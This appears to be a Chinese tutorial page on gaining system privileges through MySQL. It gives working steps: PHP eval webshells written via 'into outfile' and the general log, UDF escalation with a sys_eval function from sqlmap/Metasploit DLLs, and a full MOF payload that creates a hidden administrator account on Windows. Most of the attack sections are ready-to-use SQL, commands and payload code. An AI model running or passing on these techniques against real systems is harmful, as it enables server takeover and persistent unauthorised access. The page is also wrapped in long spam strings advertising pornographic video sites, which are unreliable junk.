亚洲综合原千岁中文字幕_国产精品99久久久久久久vr_无码人妻aⅴ一区二区三区浪潮_成人h动漫精品一区二区三

主頁 > 知識庫 > Mysql提權的多種姿勢匯總

Mysql提權的多種姿勢匯總

熱門標簽:大眾點評星級酒店地圖標注 高清地圖標注道路 話務外呼系統怎么樣 外東北地圖標注 臨清電話機器人 400電話可以辦理嗎 拉卡拉外呼系統 云南電商智能外呼系統價格 智能外呼系統復位

一、寫入Webshell

into outfile 寫shell

前提條件:

1、知道網站物理路徑

2、高權限數據庫用戶

3、load_file() 開啟 即 secure_file_priv 無限制

4、網站路徑有寫入權限

首先基礎語法查詢是否 secure_file_priv 沒有限制

show global variables like '%secure_file_priv%';

value 說明
NULL 不允許導入或導出
/var 只允許在/var目錄導入導出
不限制目錄

在 MySQL 5.5 之前 secure_file_priv 默認是空,這個情況下可以向任意絕對路徑寫文件

在 MySQL 5.5之后 secure_file_priv 默認是 NULL,這個情況下不可以寫文件

如果滿足上述所有條件的話,那么可以嘗試使用下面的 SQL 語句來直接寫 shell:

select '?php @eval($_POST[cmd]); ?>' into outfile 'C:\\soft\\WWW\\empirecms\\shell.php';

查看目標路徑下,已寫入shell.php文件

上菜刀連接

日志文件寫shell

前提條件:

1、Web 文件夾寬松權限可以寫入

2、Windows 系統下

3、高權限運行 MySQL 或者 Apache

MySQL 5.0 版本以上會創建日志文件,可以通過修改日志的全局變量來 getshell

查看日志目錄

SHOW VARIABLES LIKE 'general%';

general_log 默認關閉,開啟它可以記錄用戶輸入的每條命令,會把其保存在對應的日志文件中。
可以嘗試自定義日志文件,并向日志文件里面寫入內容的話,那么就可以成功 getshell:

更改日志文件位置

set global general_log = "ON";
set global general_log_file='C:\\soft\\WWW\\empirecms\\log.php';

查看當前日志配置

目標目錄下查看,寫入了log.php文件

寫入shell

select '?php @eval($_POST[cmd]); ?>'

上菜刀,連接


二、UDF提權

自定義函數,是數據庫功能的一種擴展。用戶通過自定義函數可以實現在 MySQL 中無法方便實現的功能,其添加的新函數都可以在SQL語句中調用,就像調用本機函數 version() 等方便。

動態鏈接庫

如果是 MySQL >= 5.1 的版本,必須把 UDF 的動態鏈接庫文件放置于 MySQL 安裝目錄下的 lib\plugin 文件夾下文件夾下才能創建自定義函數。

那么動態鏈接庫文件去哪里找呢?實際上我們常用的工具 sqlmap 和 Metasploit 里面都自帶了對應系統的動態鏈接庫文件。

sqlmap的UDF動態鏈接庫文件位置

sqlmap根目錄/data/udf/mysql

不過 sqlmap 中 自帶這些動態鏈接庫為了防止被誤殺都經過編碼處理過,不能被直接使用。不過可以利用 sqlmap 自帶的解碼工具cloak.py 來解碼使用,cloak.py 的位置為:sqlmap根目錄/extra/cloak/cloak.py ,

解碼方法如下:

解碼32位的windows動態鏈接庫:

python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll

其他linux和windows動態鏈接庫解碼類似

或者直接使用metasploit自帶的動態鏈接庫,無需解碼

Metasploit的UDF動態鏈接庫文件位置

接下來的任務是把 UDF 的動態鏈接庫文件放到 MySQL 的插件目錄下,這個目錄改如何去尋找呢?可以使用如下的 SQL 語句來查詢:

show variables like '%plugin%'


寫入動態鏈接庫

當 secure_file_priv 無限制的時候,我們可以手工寫文件到 plugin 目錄下的

select load_file('C:\\soft\\UDFmysql\\lib_mysqludf_sys_32.dll')  into dumpfile 'C:\\soft\\MySQL\\lib\\plugin\\udf.dll';

c

創建自定義函數并調用命令

創建自定義函數

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

查看是否新增了sys_eval

接著就可以通過創建的這個函數來執行系統命令了:

刪除自定義函數

drop function sys_eval;

三、MOF提權

mof提權原理

關于 mof 提權的原理其實很簡單,就是利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 文件,每分鐘都會在一個特定的時間去執行一次的特性,來寫入我們的cmd命令使其被帶入執行。

嚴苛的前提條件:

1.windows 03及以下版本

2.mysql啟動身份具有權限去讀寫c:/windows/system32/wbem/mof目錄

3.secure-file-priv參數不為null

提權過程:

MOF文件每五秒就會執行,而且是系統權限,我們通過mysql使用load_file 將文件寫入/wbme/mof,然后系統每隔五秒就會執行一次我們上傳的MOF。MOF當中有一段是vbs腳本,我們可以通過控制這段vbs腳本的內容讓系統執行命令,進行提權。

利用代碼如下(test.mof):

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")\nWSH.run(\"net.exe localgroup administrators hpdoger /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

MOF文件利用:

將上面的腳本上傳到有讀寫權限的目錄下:

這里我上傳到了C:\soft\,我們使用sql語句將文件導入到c:/windows/system32/wbem/mof/下

select load_file("C:/soft/test.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

驗證提權:

當我們成功把mof導出時,mof就會直接被執行,且5秒創建一次用戶。

關于MOF提權弊端

我們提權成功后,就算被刪號,mof也會在五秒內將原賬號重建,那么這給我們退出測試造成了很大的困擾,所以謹慎使用。那么我們如何刪掉我們的入侵賬號呢?

cmd 下運行下面語句:

#停止winmgmt服務
net stop winmgmt

#刪除 Repository 文件夾
rmdir /s /q C:\Windows\system32\wbem\Repository\


# 手動刪除 mof 文件
del c:/windows/system32/wbem/mof/nullevt.mof /F /S

# 刪除創建的用戶
net user hpdoger /delete

#重啟服務
net start winmgmt

總結

到此這篇關于Mysql提權姿勢的文章就介紹到這了,更多相關Mysql提權姿勢內容請搜索腳本之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Linux利用UDF庫實現Mysql提權
  • Mysql提權方法利用
  • 提權,以MySQL之名

標簽:山西 溫州 揚州 三明 福州 阿里 無錫 定西

巨人網絡通訊聲明:本文標題《Mysql提權的多種姿勢匯總》,本文關鍵詞  Mysql,提權,的,多種,姿勢,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Mysql提權的多種姿勢匯總》相關的同類信息!
  • 本頁收集關于Mysql提權的多種姿勢匯總的相關信息資訊供網民參考!
  • 推薦文章
    久久国产一区二区| 九九精品在线播放| 亚洲第一色在线| 欧美另类videosbestsex视频 | 国产精品免费久久| 国产a网| 色综合久久天天综合| 99色精品| 黄视频网站在线看| 韩国毛片 免费| 一级毛片视频免费| 欧美激情一区二区三区视频| 日韩av成人| 国产极品精频在线观看| 天天色色网| 久久久久久久男人的天堂| 国产网站免费观看| 欧美1区| 欧美国产日韩精品| 精品久久久久久中文字幕一区| 国产一区二区高清视频| 国产伦精品一区二区三区无广告| 亚欧乱色一区二区三区| 一级女性全黄生活片免费| 国产麻豆精品视频| 精品国产一区二区三区免费| 亚欧成人毛片一区二区三区四区| 青青青草影院| 日韩在线观看免费完整版视频| 国产伦久视频免费观看 视频| 国产91精品一区二区| 亚洲精品永久一区| 91麻豆精品国产高清在线| 精品在线免费播放| 日本在线www| 日韩欧美一及在线播放| 一级毛片视频免费| 九九热国产视频| 国产网站在线| 国产不卡福利| 精品国产亚洲人成在线| 国产高清在线精品一区二区 | 成人在激情在线视频| 国产麻豆精品免费视频| 韩国毛片免费大片| 成人影院一区二区三区| 国产精品自拍一区| 亚洲精品中文字幕久久久久久| 久久国产精品只做精品| 国产麻豆精品| 色综合久久天天综合| 精品视频在线观看视频免费视频| 天天做人人爱夜夜爽2020毛片| 亚欧成人乱码一区二区| 亚州视频一区二区| 国产成人精品一区二区视频| 亚欧乱色一区二区三区| 国产精品1024永久免费视频| 亚洲天堂免费| 九九久久99| 黄视频网站在线观看| 黄色短视屏| 久久国产精品永久免费网站| 中文字幕一区二区三区 精品| 一级女性全黄久久生活片| 日本在线不卡视频| 一级毛片视频播放| 国产一区二区精品| 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 精品国产三级a| 日韩中文字幕在线亚洲一区| 日本在线www| 国产美女在线观看| 久久精品店| 国产91精品系列在线观看| 国产高清视频免费观看| 可以免费看污视频的网站| 亚欧乱色一区二区三区| 国产一区二区精品| 黄色免费网站在线| 欧美a级片视频| 精品国产一区二区三区久久久蜜臀 | 国产高清在线精品一区二区| 成人影院久久久久久影院| 四虎久久影院| 精品美女| 夜夜操网| 四虎久久精品国产| 日韩av东京社区男人的天堂| 台湾美女古装一级毛片| 日韩女人做爰大片| 97视频免费在线观看| 尤物视频网站在线| 国产91视频网| 久久精品大片| 99色视频在线| 美国一区二区三区| 毛片的网站| 国产伦精品一区三区视频| 日本免费看视频| 亚欧成人毛片一区二区三区四区| 国产麻豆精品hdvideoss| 国产成人啪精品| 好男人天堂网 久久精品国产这里是免费 国产精品成人一区二区 男人天堂网2021 男人的天堂在线观看 丁香六月综合激情 | 国产激情视频在线观看| 国产精品12| 精品视频一区二区| 国产麻豆精品hdvideoss| 国产伦久视频免费观看视频| 成人免费福利片在线观看| 日本免费看视频| 精品国产一区二区三区免费| 日本久久久久久久 97久久精品一区二区三区 狠狠色噜噜狠狠狠狠97 日日干综合 五月天婷婷在线观看高清 九色福利视频 | 中文字幕97| 天天做日日爱| 国产一区二区精品久久| 亚洲精品影院一区二区| 好男人天堂网 久久精品国产这里是免费 国产精品成人一区二区 男人天堂网2021 男人的天堂在线观看 丁香六月综合激情 | 日韩欧美一二三区| 99久久精品国产片| 四虎影视久久久免费| 91麻豆国产| 九九九在线视频| 欧美一区二区三区性| 青青久久精品| 麻豆网站在线免费观看| 国产成人欧美一区二区三区的| 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 亚洲女人国产香蕉久久精品 | 韩国毛片 免费| 亚洲精品久久玖玖玖玖| 久久久成人网| 欧美电影免费看大全| 精品视频一区二区三区免费| 日本伦理片网站| 999精品在线| 一级片免费在线观看视频| 国产成人精品在线| 国产美女在线观看| 国产精品1024永久免费视频 | 国产精品1024永久免费视频 | 久久精品店| 日韩专区在线播放| 麻豆网站在线看| 精品视频免费看| 中文字幕一区二区三区精彩视频| 国产一区免费观看| 久久国产精品自由自在| 一本伊大人香蕉高清在线观看| 日本久久久久久久 97久久精品一区二区三区 狠狠色噜噜狠狠狠狠97 日日干综合 五月天婷婷在线观看高清 九色福利视频 | 日本乱中文字幕系列| 精品视频在线看 | 亚洲女初尝黑人巨高清在线观看| 色综合久久天天综合绕观看| 国产视频一区二区在线观看| 四虎影视精品永久免费网站| 日韩一级黄色| 日本久久久久久久 97久久精品一区二区三区 狠狠色噜噜狠狠狠狠97 日日干综合 五月天婷婷在线观看高清 九色福利视频 | 日本伦理黄色大片在线观看网站| 九九九国产| 日本特黄特黄aaaaa大片| 国产伦久视频免费观看视频| 欧美国产日韩精品| 国产91精品系列在线观看| 欧美电影免费| 午夜久久网| 欧美一级视| 二级片在线观看| 精品美女| 日本免费区| 国产韩国精品一区二区三区| 91麻豆精品国产高清在线| 韩国三级香港三级日本三级la| 国产成人欧美一区二区三区的| 午夜在线观看视频免费 成人| 免费毛片播放| 欧美a免费| 免费的黄色小视频| 一本高清在线| 免费国产在线观看| 成人免费福利片在线观看| 日本特黄特色aaa大片免费| 久久99青青久久99久久| 成人a大片高清在线观看| 天天色色网| 日韩中文字幕在线亚洲一区| 九九干| 黄视频网站在线免费观看| 日韩男人天堂| 九九久久99综合一区二区| 久久精品免视看国产明星| 精品国产一区二区三区久久久蜜臀| 好男人天堂网 久久精品国产这里是免费 国产精品成人一区二区 男人天堂网2021 男人的天堂在线观看 丁香六月综合激情 | 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 国产成人啪精品视频免费软件| 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 精品国产一区二区三区久| 九九免费高清在线观看视频| 久久国产精品永久免费网站| 精品视频在线观看一区二区三区|